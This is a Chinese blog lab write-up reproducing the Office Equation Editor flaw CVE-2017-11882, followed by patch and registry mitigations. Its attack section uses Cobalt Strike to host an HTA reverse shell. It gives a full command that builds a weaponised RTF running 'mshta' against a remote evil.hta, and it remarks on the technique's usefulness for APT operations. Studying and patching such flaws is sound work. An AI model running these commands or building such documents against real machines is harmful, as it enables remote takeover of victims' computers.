CVE-2017-11882漏洞復現


本文記錄一下針對CVE-2017-11882的漏洞復現

0x00 前言

參考backlion師傅的PDF,記錄一下這個過程。

2017年11月14日,微軟發布了11月份的安全補丁更新,其中比較引人關注的莫過於悄然修復了潛伏17年之久的Office遠程代碼執行漏洞(CVE-2017-11882)。該漏洞為Office內存破壞漏洞,影響目前流行的所有Office版本。攻擊者可以利用漏洞以當前登錄的用戶的身份執行任意命令。 由於漏洞影響面較廣,漏洞披露后,金睛安全研究團隊持續對漏洞相關攻擊事件進行關注。11月19日,監控到了已有漏洞POC在網上流傳,隨即迅速對相關樣本進行了分析。目前該樣本全球僅微軟殺毒可以檢測。

  • 漏洞影響版本:
  • Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

0x01 環境清單

  • WindowsServer 2008 (192.168.3.114)
  • Office 2007
  • MAC OSX(192.168.3.106)

0X02 復現過程

使用Cobalt Strike生成hta反彈shell

生成

將生成的hta文檔放入WebServer根目錄:http://192.168.3.106/evil.hta

我(Cobalt Strike)本地監聽了一個8081端口,用來接收客戶端的Shell

要生成一個rtf/doc文檔,github上已有生成腳本

webdav_exec_CVE-2017-11882.py -> http://payloads.online/tools/cve-2017-11882/webdav_exec_CVE-2017-11882.py

生成rtf文檔:

python webdav_exec_CVE-2017-11882.py -u http://192.168.3.106/evil.hta -e "mshta http://192.168.3.106/evil.hta" -o test.rtf
!!! Completed !!!

最后將test.rtf在目標機器上執行 =_=||,其實可以實戰的,對於APT的幫助很大

結果

目標機器上執行后,我們可以在Cobalt Strike看到來自客戶端的會話

shell

0x03 修復建議

1、微軟已經對此漏洞做出了修復。

  • 下載https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 更新補丁進行修補
  • 開啟Windows Update功能,定期對系統進行自動更新

2、由於該公式編輯器已經17年未做更新,可能存在大量安全漏洞,建議在注冊表中取消該模塊的注冊。

  • 按下Win R組合鍵,打開cmd.exe
  • 輸入以下兩條命令: reg add “HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046} ” /v “Compatibility Flags” /t REG_DWORD /d 0x400


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM